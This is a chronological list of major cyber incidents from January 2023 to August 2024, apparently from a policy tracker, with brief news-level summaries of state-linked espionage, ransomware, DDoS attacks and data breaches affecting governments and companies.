August 2024: U.S. government officials blamed Iranian hackers for breaking into Donald Trump’s presidential campaign. Hackers also attempted to break into the then-Biden-Harris campaign, then offered to share the stolen Trump campaign documents with the campaign, but were ignored. The attack comes as U.S. officials raise warnings about potential foreign interference in the upcoming U.S. election from Russia, China, Iran, and North Korea.

August 2024: The United Nations unanimously approved its first treaty on cybercrime. The treaty will face a General Assembly vote in the fall.

August 2024: Russian cyber criminals are deploying malware against diplomats through a used-car email scheme. The attackers embed a file supposedly with images of a used car in their email, but the file contains backdoor malware that established persistent access for attackers to engage in for follow-on data theft, reconnaissance, and surveillance activities.

July 2024: South Korea’s military is investigating the leak of highly sensitive information on Seoul’s espionage activities and issued an arrest warrant for a suspect. The information included personal data on Seoul’s non-official agents conducting undercover espionage overseas. The information was transferred to the suspect’s personal laptop before being leaked. Lawmakers said the leak was first discovered in June and was not the result of a hack.

July 2024: A faulty software update for Microsoft Windows issues by cybersecurity firm CrowdStrike caused a global IT outage that disrupted airline and hospital operations. It affected approximately 8.5 million machines and cost Fortune 500 companies $5.4 billion, according to reports.

July 2024: Germany accused China of directing a “serious” cyberattack against Germany’s Federal Office for Cartography and Geodesy (BKG), which conducts precision mapping of the entire country, in 2021. The findings come at the end of a three-year investigation into the incident and as Germany plans a rip-and-replace project for Chinese telecommunications infrastructure in Germany over security concerns.

July 2024: Australia, the United States, Canada, the United Kingdom, Germany, Japan, South Korea, and New Zealand issued a warning about malicious Chinese state-sponsored cyber activity in their networks. It marked the first time South Korea and Japan joined with Australia to attribute malicious cyber actions to China, and the first time Australia led a cyber attribution effort against China.

June 2024: Japan’s space agency has suffered a series of cyberattacks since last year, according to the Japanese government. Japan’s Chief Cabinet Secretary claimed the targeted networks did not contain sensitive rocket or satellite information, and that the attackers were “from outside of Japan.”

June 2024: Hackers deployed ransomware in Indonesia’s national data center which briefly disrupted a variety of immigration services, including immigration document management services at airports, and deleted information that was not backed up. The attack prompted Indonesia’s Director General of Informatics Applications at the Communications and Informatics Ministry to resign and initiated and a nation-wide audit of Indonesia’s national data centers.

June 2024: Belarusian state-sponsored hackers launched an espionage campaign Ukraine’s Ministry of Defense and a Ukrainian military base. The attackers sent targets phishing emails with drone image files a malicious Microsoft Excel spreadsheet.

June 2024: Germany’s main opposition party, the Christian Democratic Union, suffered a cyberattack just ahead of European Parliamentary elections. Germany’s interior ministry did not disclose the extend of the attack or the suspected perpetrator, but acknowledged it was “serious.” The attack occurred shortly after Germany’s Social Democratic party was attacked by Russian hackers. The party briefly took down parts of its IT service as a precaution.

June 2024: The government of Palau accused Chinese hackers of stealing over 20,000 government documents shortly after the island nation signed a 20-year economic and security deal with the United States in March 2024. Palau’s president said this was the first major attack on government records that the island has seen.

May 2024: A new report from Canada’s Communications Security Establishment detected Chinese espionage activity against eight members of Parliament and one senator starting in 2021. The spies likely attempted to obtain information from the targets’ personal and work devices but were unsuccessful, according to the report. The Parliamentarians were members of Canada’s Inter-Parliamentary Alliance on China, which focuses on how democracies should approach PRC-related issues. The report also mentioned this activity was similar to activity against 19 European countries dating back to 2020.

May 2024: Recent media reports stated Pakistani cyber spies deployed malware against India’s government, aerospace, and defense sectors. The group sent phishing emails masquerading as Indian defense officials to infect their targets’ devices and access sensitive information. The attack’s extent is unknown.

May 2024: Chinese hackers hit Britain’s Ministry of Defense with a cyberattack that exposed sensitive information on every troop apart from the UK’s special forces. The attackers targeted a third-party contractor to access names and bank details of current and former members of the armed forces. The UK Minister of Defence stopped short of publicly naming China as the culprit.

May 2024: Poland and the Czech Republic accused Russian cyber spies of targeting government and infrastructure networks. Both countries claim the attacks occurred around the same time Russian hackers attacked the German government. Hackers gained access by exploited a Microsoft Outlook vulnerability, and the extent of the compromised data is currently unknown.

May 2024: Germany accused Russian hackers of breaking into the emails of Germany’s Social Democrats, the leading party in its governing coalition, and recalled its ambassador from the country. The campaign started in March 2022 when hackers exploited vulnerabilities in Microsoft Outlook to target the party’s executive committee, as well as German defense and aerospace companies.

April 2024: Ukraine’s military intelligence agency launch a cyberattack against Russia’s ruling United Russia party the same day Russia hosted its Victory Dictation. Attackers launched a barrage of DDoS attacks against United Russia’s servers, websites, and domains to make them inaccessible. United Russia publicly admitted to suffering from a “massive” DDoS attack.

April 2024: Belarusian pro-democracy hackers, known as the Belarusian Cyber-Partisans, crippled the website of Belarus’ main security service agency for over two months. The hackers also published a list of website administrators, its database, and server logs on its Telegram channel. This is the latest in a series of attacks against the Belarusian government by the group.

April 2024: Police in the United Kingdom are investigating a series of “honey trap” attacks against British MPs. Attackers sent explicit messages allegedly of themselves over WhatsApp to their target for the apparent purpose of acquiring compromising images of the target. The perpetrators of these attacks are currently unknown.

April 2024: Germany plans to create a cyber military branch as part of its military restructuring. Germany’s defense minister, Boris Pistorius, stated the new Cyber and Information Domain Service (CIR) would help deter increasing cyber aggression from Russia against Germany and its NATO allies.

April 2024: Hackers attacked El Salvador’s national cryptocurrency wallet Chivo and exposed over 144 GB of sensitive personal information of millions of Salvadorians. The hackers also released Chivo’s source code publicly. The Salvadorian government has not released an official public statement on the attack.

March 2024: A “massive” cyberattack disrupted the African Union’s systems for over a week and infected over 200 user devices, according to the deputy chair of the AU Commission. The cause of the cyberattack is unknown.

March 2024: Iranian hackers compromised an IT network connected to an Israeli nuclear facility. Hackers leaked sensitive facility documents but did not compromise its operational technology network.

March 2024: Russian hackers launched phishing attacks against German political parties. Hackers concealed ransomware in a fake dinner invitation from Germany’s Christian Democratic Union to install a backdoor in their victim’s computer.

March 2024: India’s government and energy sectors was breached in a cyber espionage campaign. Hackers sent a malicious file disguised as a letter from India’s Royal Air Force to offices responsible for India’s electronic communications, IT governance, and national defense. Researchers have not yet determined who conducted the attack.

March 2024: A U.S. Department of Justice indictment revealed Chinese hackers targeted several EU members of the Inter-Parliamentary Alliance on China and Italian MPs. The attack was designed to detect IP addresses and the targets’ locations.

March 2024: Canada pulled its financial intelligence system FINTRAC offline after a “cyber incident” by a currently unidentified attacker. FINTRAC claims the attack does not involve its intelligence or classified systems but declined to disclose further details of the incident.

March 2024: Russian hackers leaked an intercepted conversation between German military officials about the country’s support for Ukraine. In the call, the head of Germany’s Air Force discussed the possibility of supplying Taurus missiles to Ukraine and commented on German Chancellor Olaf Scholz’s hesitance to send the missiles. Germany announced it would investigate the incident and believes the leak was intended to inflame divisions in Germany.

March 2024: Switzerland’s National Cyber Security Centre (NCSC) confirmed that leaded data from a May 2023 breach included 65,000 documents from the Federal Administration. The documents contained sensitive personal data, classified information, and passwords, and were from Switzerland’s federal police, judiciary, and migration offices. Swiss officials had originally assessed that breach only impacted non-government documents.

March 2024: Microsoft claims Russian hackers stole its source code and are continuing to gain unauthorized access to its internal systems as part of their November 2023 campaign to spy on senior Microsoft executives. Microsoft also said attackers increased the volume of their “password spray” attacks by nearly tenfold between January and February 2024. The company did not disclose further details on the source code access or breached internal systems.

February 2024: Russian hackers launched an espionage campaign against the embassies of Georgia, Poland, Ukraine, and Iran beginning in 2023. Hackers exploited a bug in a webmail server to inject malware into servers at the embassies and collect information on European and Iranian political and military activities.

February 2024: Roughly 190 megabytes of data from a Chinese cybersecurity company were exposed online, revealing the company’s espionage efforts on the governments of the United Kingdom, India, Indonesia, and Taiwan. The leak’s source is unknown.

February 2024: The Royal Canadian Mounted Police suffered a cyberattack against its networks. The RCMP stated it is investigating this “alarming” incident and does not believe it had an impact on its operations or the safety and security of Canadians. It is so far unclear who is behind the attack and if it was a data breach or security incident.

February 2024: U.S. officials hacked an Iranian military spy ship that was sharing intelligence with Houthi rebels who have been firing on ships in the Red Sea. According to U.S. officials, the attack was part of the Biden administration’s response to an Iranian drone stroke that killed three U.S. soldiers in Jordan.

February 2024: A data breach of French health insurance companies in January 2024 affected 33 million French citizens, or nearly half the country’s population. The attack compromised sensitive birth date, social security, and marital status information, but not medical history. The French data protection agency opened an investigation to determine if the companies complied with cybersecurity guidelines under the EU’s General Data Protection Regulations.

February 2024: Chinese spies places malware in a Dutch military network in 2023. The network was not connected to the defense ministry’s main network, which reduced damage. This is the first time the Netherlands has publicly accused China of cyber espionage.

January 2024: Hackers breached Global Affairs Canada’s secure VPN in December 2023, allowing hackers to access sensitive personal information of users and employees. It affected staff emails, calendars, and contacts. It’s unclear if classified information was compromised or lost. The hacker’s identity is currently unknown.

January 2024: Russian hackers launched a ransomware attack against Sweden’s only digital service provider for government services. The attack affected operations for 120 government offices and came as Sweden prepared to join NATO. Sweden expects disruptions to continue for several weeks.

January 2024: Microsoft announced that Russian hackers broke into its corporate systems. Hackers used a “password spray attack” to steal emails and documents from accounts of Microsoft’s senior leadership, cybersecurity, and legal teams back in November 2023.

January 2024: Russian hackers attacked 65 Australian government departments and agencies and stole 2.5 million documents in Australia’s largest government cyberattack. Hackers infiltrated an Australian law firm that worked with the government to gain access to government files.

January 2024: The Australian government identified and sanctioned Aleksandr Ermakov as the Russian hacker who breached Medibank, the country’s largest private health insurance provider, in 2022. He stole information from 9.7 million current and former Medibank customers. This is the first time Australia has issued cyber sanctions against an individual since the framework was established in 2021. The U.S. and UK also sanctioned Ermakov.

January 2024: Russian agents hacked residential webcams in Kyiv to gather information on the city’s air defense systems before launching a missile attack on Kyiv. Hackers changed the cameras’ angles to gather information on nearby critical infrastructure facilities and stream the footage on YouTube. Ukraine has since ordered webcam operators in the country to stop live broadcasts.

December 2023: Israeli-linked hackers disrupted approximately 70% of gas stations in Iran. Hackers claimed the attack was in retaliation for aggressive actions by Iran and its proxies in the region. Pumps restored operation the next day, but payment issues continued for several days.

December 2023: Ukrainian state hackers crippled Russia’s largest water utility plant by encrypting over 6,000 computers and deleting over 50 TB of data. Hackers claimed their attack was in retaliation for the Russian Kyivstar cyberattack.

December 2023: Russian hackers hit Ukraine’s largest mobile phone provider, Kyivstar, disabling access to its 24 million customers in Ukraine. Hackers claim to have destroyed more than 10,000 computers and 4,000 servers, including cloud storage and backup systems. The attack began hours before President Zelenskyy met with President Biden in Washington D.C.

December 2023: Ukraine’s military intelligence service (the GRU) claims to have disabled Russia’s tax service in a cyberattack. According to the GRU, the attack destroyed the system’s configuration files, databases, and their backups, paralyzing Russia’s tax service.

November 2023: Suspected Chinese hackers launched an espionage campaign against Uzbekistan and the Republic of Korea. Hackers use phishing campaigns to gain access to their target’s systems and decrypt their information.

November 2023: Chinese-linked hackers attacked Japan’s space agency during summer 2023 and compromised the organization’s directory. The agency shut down parts of its network to investigate the breach’s scope, but claims it did not compromise critical rocket and satellite operations information.

November 2023: Chinese hackers compromised Philippine government networks. Beginning in August 2023, hackers used phishing emails to imbed malicious code into their target’s systems to establish command-and-control and spy on their target’s activities.

November 2023: Trinidad and Tobago’s Prime Minister Dr. Keith Rowley declared the latest ransomware attack against the country’s telecommunications service to be a “national security threat.” Hackers stole an estimated six gigabytes of data, including email addresses, national ID numbers, and phone numbers.

November 2023: Denmark suffered its largest cyberattack on record when Russian hackers hit twenty-two Danish power companies. The attack began in May 2023 and appeared to be aimed at gaining comprehensive access to Denmark’s decentralized power grid. Hackers exploited a critical command injection flaw and continued to exploit unpatched systems to maintain access.

November 2023: Chinese cybercriminals targeted at least 24 Cambodian government networks, including the National Defense, Election Oversight, Human Rights, National Treasury, Finance, Commerce, Politics, Natural Resources and Telecommunications agencies. Hackers disguised themselves as cloud storage services to mask their data exfiltration. Initial research indicates the attack is part of a broader Chinese espionage campaign.

October 2023: Hacktivists stole 3,000 documents from NATO, the second time in three months that hacktivists have breached NATO’s cybersecurity defenses. Hackers described themselves as “gay furry hackers” and announced their attack was retaliation against NATO countries’ human rights abuses. NATO alleges the attack did not impact NATO missions, operations, or military deployments.

October 2023: Researchers discovered what appears to be a state-sponsored software tool designed for espionage purposes and used against ASEAN governments and organizations.

October 2023: Pro-Hamas and pro-Israeli hacktivists have launched multiple cyberattacks against Israeli government sites and Hamas web pages in the aftermath of Hamas’ attacks on Israel on October 7th. Russian and Iranian hacktivists also targeted Israeli government sites, and Indian hacktivists have attacked Hamas websites in support of Israel.

October 2023: Vietnamese hackers attempted to install spyware on the phones of journalists, United Nations officials and the chairs of the House Foreign Affairs Committee and Senate Homeland Security and Governmental Affairs. The spyware was designed to siphon calls and texts from infected phones, and the unsuccessful deployment comes while Vietnamese and American diplomats were negotiating an agreement to counter China’s growing influence in the region.

October 2023: New reporting reveals Chinese hackers have been targeting Guyana government agencies with phishing emails to exfiltrate sensitive information since February 2023.

October 2023: North Korean hackers sent malware phishing emails to employees of South Korea’s shipbuilding sector. South Korea’s National Intelligence Service suggested that the attacks were intended to gather key naval intelligence that could help North Korea build larger ships.

September 2023: Indian hacktivists targeted Canada’s military and Parliament websites with DDoS attacks that slowed system operations for several hours. Hacktivists referenced Canadian Prime Minister Justin Trudeau’s public accusation against India of killing Sikh independence activist Hardeep Singh Nijjar as motivation for the hack.

September 2023: Iranian hackers launched a cyberattack against Israel’s railroad network. The hackers used a phishing campaign to target the network’s electrical infrastructure. Brazilian and UAE companies were also reportedly targeted in the same attack.

September 2023: U.S. and Japanese officials warn that Chinese state-sponsored hackers placed modifying software inside routers to target government industries and companies located in both countries. The hackers use firmware implants to stay hidden and move around in their target’s networks. China has denied the allegations.

September 2023: A massive cyberattack hit Bermuda’s Department of Planning and other government services. The country’s hospitals, transportation, and education centers remained functional, but other services were down for several weeks. Bermuda announced that it is investigating the attack and declined to state if any sensitive data was compromised.

September 2023: Cybercriminals targeted Kuwait’s Ministry of Finance with a phishing ransomware attack. Kuwait isolated the Ministry and other government systems to protect them from potential further attacks.

September 2023: Russian is stepping up cyberattacks against Ukrainian law enforcement agencies, specifically units collecting and analyzing evidence of Russian war crimes, according to Ukrainian officials. Russian cyberattacks have primarily targeted Ukrainian infrastructure for most of the war.

September 2023: Russian forces in occupied Crimea reported a cyberattack on Crimean Internet providers. The attack happened around the same time that a Ukrainian missile strike aimed at Russian naval headquarters in the area. Ukrainian officials have yet to comment.

September 2023: Russian cybercriminals breached the International Criminal Court’s IT systems amid an ongoing probe into Russian war crimes committed in Ukraine.

September 2023: A new Microsoft report indicates an increase of Chinese cyber operations in the South China Sea, as well as increased attacks against the U.S. defense industrial base and U.S. critical infrastructure. The increase comes amid rising tensions between China and the U.S.

September 2023: A Russian ransomware group leaked Australian federal police officers’ details on the dark web. The leak is the latest phase of a Russian attack which started in April 2023 against an Australian law firm that services several Australian government agencies.

September 2023: The iPhone of a Russian journalist for the independent newspaper Meduza was infected with Pegasus spyware in Germany this year. The incident is the first known instance of the spyware being used against a prominent Russian target. The country behind the spyware placement is unknown, but Latvia, Estonia, Azerbaijan, Kazakhstan, and Uzbekistan are all suspects given past use of Pegasus spyware or their allegiance to Russia.

September 2023: Suspected Chinese hackers attacked the national power grid of an unspecified Asian country earlier this year using Chinese malware. The group corrupted a Windows application that allowed them to move laterally within their target’s systems.

September 2023: A ransomware attack wiped four months of Sri Lankan government data. The country’s cloud services system didn’t have backup services available for the data from May 17 to August 26, according to reporting. Malicious actors targeted Sri Lanka’s government cloud system starting in August 2023 by sending infected links to government workers.

September 2023: An Indian cybersecurity firm uncovered plans from Pakistani and Indonesian hacking groups to disrupt the G20 summit in India. The hacktivists are expected to use DDoS attacks and mass defacement in their attacks, which are presumed to be the latest development in the hacktivist battle between these nations according to the firm’s research.

September 2023: Russian hackers stole thousands of documents from the British Ministry of Defense and uploaded them to the dark web. The documents contained accessibility details for a nuclear base in Scotland, high-security prisons, and other national security details. Hackers acquired the documents by breaking into a British fencing developer and gaining backdoor access to Ministry files.

September 2023: Russian cyber criminals accessed sensitive information from South Africa’s Department of Defense, including military contracts and personnel information. The Department reversed its previous statement denying the data leak.

August 2023: Russian hacktivists launched DDoS attacks against Czech banks and the Czech stock exchange. The hackers cut online banking access to the banks’ clients and demanded that the institutions stop supporting Ukraine. Bank representatives claim the hacks did not threaten their clients’ finances.

August 2023: Unnamed hackers took X, formerly known as Twitter, offline in several countries and demanded that owner Elon Musk open Starlink in Sudan. Attackers flooded the server with traffic to disable access for over 20,000 individuals in the U.S., UK, and other countries.

August 2023: Cybercriminals are allegedly selling a stolen dataset from China’s Ministry of State Security. The full data set purportedly includes personal identification information for roughly half a billion Chinese citizens and “classified document[s],” according to the criminals’ post about the sale.

August 2023: Russian hacktivists launched several DDoS attacks that knocked the Polish government’s website offline, as well as the Warsaw Stock exchange and several Polish national banks.

August 2023: Russian hacktivists disabled Poland’s rail systems by gaining access to the system’s railway frequencies and transmitted a malicious signal that halted train operations. Attackers blasted Russia’s national anthem and a speech from Putin on Russia’s military operation in Ukraine during the attack.

August 2023: Chinese hackers targeted a U.S. military procurement system for reconnaissance, along with several Taiwan-based organizations. Attackers targeted high-bandwidth routers to exfiltrate data and establish covert proxy networks within target systems.

August 2023: Ukrainian hackers claim to have broken into the email of a senior Russian politician and leaked medical and financial documents, as well as messages that allegedly connect him to money laundering and sanctions evasion plots.

August 2023: Ecuador’s national election agency claimed that cyberattacks from India, Bangladesh, Pakistan, Russia, Ukraine, Indonesia and China caused difficulties for absentee voters attempting to vote online in the latest election. The agency didn’t elaborate on the nature of the attacks.

August 2023: Suspected North Korean hackers attempted to compromise a joint U.S.-South Korean military exercise on countering nuclear threats from North Korea. Hackers launched several spear phishing email attacks at the exercise’s war simulation center.

August 2023: Bangladesh shut down access to their central bank and election commission websites amid warnings of a planned cyberattack by an Indian hacking group. The shutdown was intended to prevent a cyberattack similar to a 2016 incident in Bangladesh where hackers stole nearly $1 billion, according to the central bank’s statement.

August 2023: Belarusian hackers targeted foreign embassies in the country for nearly a decade, according to new reporting. Hackers disguised malware as Windows updates to get diplomats to download it onto their devices.

August 2023: Chinese hackers obtained personal and political emails of a U.S. Congressman from Nebraska. The hackers exploited the same Microsoft vulnerability that gave them access to emails from the State Department and Department of Commerce.

August 2023: Iranian cyber spies are targeting dissidents in Germany, according to Germany’s domestic intelligence unit. The spies are using false digital personas tailored to victims to build a rapport with their targets before sending a malicious link to a credential harvesting page.

August 2023: Ukraine’s State Security Service (SBU) claims that Russia’s GRU is attempting to deploy custom malware against Starlink satellites to collect data on Ukrainian troop movements. SBU members discovered malware on Ukrainian tablets that were captured by the Russians before being recovered by Ukrainian forces.

August 2023: Russian hackers launched a ransomware attack against a Canadian government service provider, compromising the data of 1.4 million people in Alberta. The organization paid the ransom and claimed that very little data was lost.

August 2023: A Canadian politician was targeted by a Chinese disinformation campaign on WeChat. The attack included false accusations about the politician’s race and political views. The Canadian government believes the attacks are retaliation against the politician’s criticism of China’s human rights policies.

August 2023: The Canadian government accused a “highly sophisticated Chinese state-sponsored actor” of hacking a prominent Canadian federal scientific research agency.

August 2023: Russia’s military intelligence service attempted to hack Ukrainian Armed Forces’ combat information systems. Hackers targeted Android tablets that Ukrainian forces use for planning and orchestrating combat missions.

August 2023: The United Kingdom’s Electoral Commission revealed that Russian hackers breached the commission’s network beginning in August 2021. They obtained information on tens of thousands of British citizens by accessing the commission’s email and file-sharing system.

August 2023: According to a new report, North Korean hackers breached computer systems at a Russian missile developer for five months in 2022. Analysts could not determine what information may have been taken or viewed.

July 2023: China claims that an earthquake monitoring system in Wuhan was hacked by “U.S. cybercriminals.” Chinese state media asserts that a backdoor program with the capacity to steal seismic data was inserted into the program.

July 2023: Kenya’s eCitizen service was disrupted by pro-Russian cybercriminals for several days. Kenya’s Ministry of Information, Communications, and the Digital Economy claimed that no data was accessed or lost.

July 2023: Russian-linked cyber hackers have targeted Ukrainian state services such as the app “Diia” using malware and phishing attacks. The primary targets are Ukrainian defense and security services.

July 2023: The Ministry of Justice in Trinidad and Tobago was hit with a DDoS attack that disrupted court operations across the country. The ministry reported outages beginning in late June, which are believed to be linked to this same attack.

July 2023: New Zealand’s parliament was hit by a cyberattack from a Russian hacking group. The group said their attack was retaliation against New Zealand’s support for Ukraine, such as its assistance with training Ukrainian troops and sanctions against Russia. Heckers temporarily shut down the New Zealand Parliament, Parliamentary Counsel Office (PCO) and Legislation websites in a DDoS attack.

July 2023: Russian hackers targeted twelve government ministries in Norway to gain access to sensitive information. The hackers exploited a vulnerability in a software platform used by the ministries.

July 2023: A South Korean government-affiliated institution fell victim to a phishing scandal that resulted in a loss of 175 million wons, reportedly the first phishing incident against a South Korean government public organization.

July 2023: Chinese-linked hackers infected a Pakistani government app with malware. A state bank and telecoms provider were also targeted in the attack.

July 2023: Chinese hackers breached the emails of several prominent U.S. government employees in the State Department and Department of Commerce through a vulnerability in Microsoft’s email systems.

July 2023: Russian hackers targeted numerous attendees of the latest NATO Summit in Vilnius. The assailants used a malicious replica of the Ukraine World Congress website to target attendees.

July 2023: A Polish diplomat’s advertisement to purchase a used BMW was corrupted by Russian hackers and used to target Ukrainian diplomats. The hackers copied the flyer, imbedded it with malicious software and distributed it to foreign diplomats in Kyiv.

June 2023: A group allegedly tied to the private military corporation Wagner hacked a Russian satellite telecommunications provider that services the Federal Security Service (FSB) and Russian military units. The attack comes after Wagner’s attempted rebellion against President Vladimir Putin over the war in Ukraine.

June 2023: A Pakistani-based hacker group infiltrated the Indian army and education sector in the group’s latest wave of attacks against Indian government institutions.The hack is the latest in a series of targeted attacks from this group that have intensified over the past year.

June 2023: Pro-Russian hacktivists attacked several European banking institutions, including the European Investment Bank, in retaliation against Europe’s continued support of Ukraine. The hacktivists used a DDoS attack to disrupt EIB.

June 2023:Several U.S. federal government agencies, including Department of Energy entities, were breached in a global cyberattack by Russian-linked hackers. Cybercriminalstargeted a vulnerability in software that is widely used by the agencies, according to a US cybersecurity agent.

June 2023:An Illinois hospital became the first health care facility to publicly list a ransomware attack as a primary reason for closing. The attack, which occurred in 2021,permanently crippled the facility’s finances.

June 2023: Pro-Russian hackers targeted several Swiss government websites, including those for Parliament, the federal administration, andthe Geneva airport. The DDoS attacks coincide in conjunction with preparations for Ukrainian President Volodimir Zelensky’s virtual address before the Swiss parliament.

June 2023:According to new reporting,North Korean hackers have been impersonating tech workers or employers to steal more than $3 billion since 2018. The money has reportedly beenused to fundthe country’s ballistic missiles program, according to U.S. officials.

June 2023: Ukrainian hackers claimed responsibility for an attack on a Russian telecom firm that provides critical infrastructure to the Russian banking system. The attack occurred in conjunction with Ukraine’s counteroffensive.

June 2023: Russia’s Federal Security Services (FSB) alleged that Apple worked closely with US intelligence agencies to hack thousands of iPhones belonging to Russian users and foreign diplomats. Apple denied theclaims, and the NSA declined to comment.

May 2023: Belgium’s cyber security agency has linked China-sponsored hackers to a spearfishing attack on a prominent politician. The attack comes as European governments are increasingly willing to challenge China over cyber offences.

May 2023: Chinese hackers breached communications networks at a U.S. outpost in Guam. The hackers used legitimate credentials, making it harder to detect them.

May 2023: Chinese hackers targeted Kenyan government ministries and state institutions, including the presidential office. The hacks appeared to be aimed at gaining information on debt owed to Beijing.

May 2023: A likely Russia state group has targeted government organizations in Central Asia. The group is using previously unknown malware, and the attacks focused on document exfiltration.

May 2023: An unidentified group hacked targets in both Russia and Ukraine. The motive for the attacks was surveillance and data gathering,

May 2023: Russian-linked hackivist conducted an unsuccessful cyberattack against Ukraine’s system for managing border crossings by commercial trucks through a phishing campaign

April 2023: Sudan-linked hackers conducted a DDoS attack on Israel’s Independence Day, taking the Israeli Supreme Court’s website offline for several hours. Israeli cyber authorities reported no lasting damage to network infrastructure. Hackers claimed to have also attacked several other Israeli government and media sites, but those attacks could not be confirmed. The group has been active since at least January 2023, attacking critical infrastructure in Northern Europe and is considered religiously motivated.

April 2023: NSA cyber authorities reported evidence of Russian ransomware and supply chain attacks against Ukraine and other European countries who have provided Ukraine with humanitarian aid during the war in Ukraine. There were no indications of these attacks against U.S. networks.

April 2023: Iranian state-linked hackers targeted critical infrastructure in the U.S. and other countries in a series of attacks using a previously unseen customized dropper malware. The hacking group has been active since at least 2014, conducting social engineering and espionage operations that support the Iranian government’s interests.

April 2023: Recorded Future released a report revealing data exfiltration attacks against South Korean research and academic institutions in January 2023. The report identified Chinese-language hackers. Researchers believe that this is a hacktivist group motivated by patriotism for China.

April 2023: Researchers at Mandiant attributed a software supply chain attack on 3CX Desktop App software to North Korea-linked hackers. During its investigation, Mandiant found that this attack used a vulnerability previously injected into 3CX software. This is Mandiant’s first discovery of a software supply chain attack leveraging vulnerabilities from a previous software supply chain attack.

April 2023: Chinese hackers targeted telecommunication services providers in Africa in an espionage campaign since at least November 2022. Researchers believe the group has targeted pro-domestic human rights and pro-democracy advocates, including nation-states, since at least 2014. Using the access from the telecom providers, the group gathers information including keystrokes, browser data, records audio, and captures data from individual targets on the network.

April 2023: A Russia-linked threat group launched a DDoS attack against Canadian prime Minister Justin Trudeau, blocking access to his website for several hours. The operation’s timing coincided with the Canadian government’s meeting with Ukrainian Prime Minister Denys Shmyhal, suggesting that the operation was retaliation.

April 2023: North Korea-linked hackers are operating an ongoing espionage campaign targeting defense industry firms in Eastern Europe and Africa. Researchers at Kaspersky believe the hacking group shifted its focus in 2020 from financially motivated coin-mining attacks to espionage.

April 2023: Researchers discovered Israeli spyware on the iPhones of over 5 journalists, political opposition figures, and an NGO worker. Hackers initially compromised targets using malicious calendar invitations. The hackers’ origin and motivations are unclear.

April 2023: Ukraine-linked hacktivists targeted the email of Russian GRU Unit26165’s leader, Lieutenant Colonel Sergey Alexandrovich, leaking his correspondence to a volunteer intelligence analysis group. The exfiltrated data contained Alexandrovich’s personal information, unit personnel files, and information on Russian cyberattack tools.

April 2023: North Korean-linked hackers targeted people with expertise on North Korea policy issues in a phishing campaign. Hackers posed as journalists requesting interviews from targets, inviting them to use embedded links for scheduling and stealing their login credentials. The amount of information stolen and number of targets are unclear.

March 2023. Russian hackers brought down the French National Assembly’s website for several hours using a DDoS attack. In a Telegram post, hackers cited the French government’s support for Ukraine as the reason for the attack.

March 2023. CISA and FBI reported that a U.S. federal agency was targeted by multiple attackers, including a Vietnamese espionage group, in a cyberespionage campaign between November 2022 and January 2023. Hackers used a vulnerability in the agency’s Microsoft Internet Information Services (IIS) server to install malware.

March 2023. A Chinese cyberespionage group targeted an East Asian data protection company who serves military and government entities that lasted approximately a year.

March 2023: (3/24) A South Asian hacking group targeted firms in China’s nuclear energy industry in an espionage campaign. Researchers believe the group commonly targets the energy and government sectors of Pakistan, China, Bangladesh, and Saudi Arabia.

March 2023. Estonian officials claim that hackers unsuccessfully targeted the country’s internet voting system during its recent parliamentary elections. Officials did not release details about the attacks or provide attribution.

March 2023. North Korean hackers targeted U.S.-based cybersecurity research firms in a phishing campaign. The campaign was meant to deliver malware for cyberespionage.

March 2023. A Chinese cyber espionage group targeted government entities in Vietnam, Thailand, and Indonesia, using newly developed malware optimized to evade detection.

March 2023. Russian hackers launched social engineering campaigns targeting U.S. and European politicians, businesspeople, and celebrities who have publicly denounced Vladimir Putin’s invasion of Ukraine. Hackers persuaded victims to participate in phone or video calls, giving misleading prompts to obtain pro-Putin or pro-Russian soundbites. They published these to discredit victims’ previous anti-Putin statements.

March 2023. Slovakian cybersecurity researchers discovered a new exploit from a Chinese espionage group targeting political organizations in Taiwan and Ukraine.

March 2023. Poland blamed Russia hackers for a DDoS attack on its official tax service website. Hackers blocked users’ access to the site for approximately an hour, but no data was leaked in the attack. A pro-Russian hacking group had earlier published a statement on Telegram about its intention to attack the Polish tax service.

February 2023. Russian hackers deployed malware to steal information from Ukrainian organizations in a phishing campaign. The malware is capable of extracting account information and files, as well as taking screenshots. Researchers believe the group is a key player in Russia’s cyber campaigns against Ukraine.

February 2023. A pro-Russian hacking group claimed responsibility for DDoS attacks against NATO networks used to transmit sensitive data. The attack disrupted communications between NATO and airplanes providing earthquake aid to a Turkish airbase. The attack also took NATO’s sites offline temporarily.

February 2023. Polish officials reported a disinformation campaign targeting the Polish public. Targets received anti-Ukrainian refugee disinformation via email. Officials claimed these activities may be related to Russia-linked hackers.

February 2023. A North Korean hacking group conducted an espionage campaign between August and November 2022. Hackers targeted medical research, healthcare, defense, energy, chemical engineering and a research university, exfiltrating over 100MB of data from each victim while remaining undetected. The group is linked to the North Korean government.

February 2023. Latvian officials claimed that Russian hackers launched a phishing campaign against its Ministry of Defense. The Latvian Ministry of Defense stated this operation was unsuccessful.

February 2023. Iranian hacktivists disrupted the state-run television broadcast of a speech by Iranian president Ebrahim Raisi during Revolution Day ceremonies. Hackers aired the slogan “Death to Khamenei” and encouraged citizens to join antigovernment protests.

February 2023. An Iranian hacking group launched an espionage campaign against organizations in the Middle East. Hackers used a backdoor malware to compromise target email accounts. Researchers claim the hacking group is linked to Iranian intelligence services.

February 2023. Iranian hacktivists claimed responsibility for taking down websites for the Bahrain international airport and state news agency.

February 2023. Hackers launched a ransomware attack against Technion University, Israel’s top technology education program. Hackers demanded 80 bitcoin ($1.7 million USD) to decrypt the university’s files. Israeli cybersecurity officials blamed Iranian state-sponsored hackers for the attack.

February 2023. Hackers disabled Italy’s Revenue Agency (Agenzia delle Entrane) website. While the website was disabled, users received phishing emails directing them to a false login page that mirrored the official agency site.

February 2023. Chinese cyberespionage hackers performed a spear-phishing campaign against government and public sector organizations in Asia and Europe. The emails used a draft EU Commission letter as its initial attack vector. These campaigns have occurred since at least 2019.

January 2023. Latvian officials claimed that Russia-linked hackers launched a cyber espionage phishing campaign against its Ministry of Defense. The Latvian Ministry of Defense stated this operation was unsuccessful.

January 2023. CISA, the NSA, and the Multi-State Information Sharing and Analysis Center released a joint advisory warning of an increase in hacks on the federal civilian executive branch utilizing remote access software. This follows an October 2022 report on a financially motivated phishing campaign against multiple U.S. federal civilian executive branch agencies.

January 2023. Russia-linked hackers deployed a ransomware attack against the UK postal service, the Royal Mail. The attack disrupted the systems used to track international mail.

January 2023. Iran-linked hackers executed ransomware attacks and exfiltrated data from U.S. public infrastructure and private Australian organizations. Australian authorities claim that the data exfiltrated was for use in extortion campaigns.

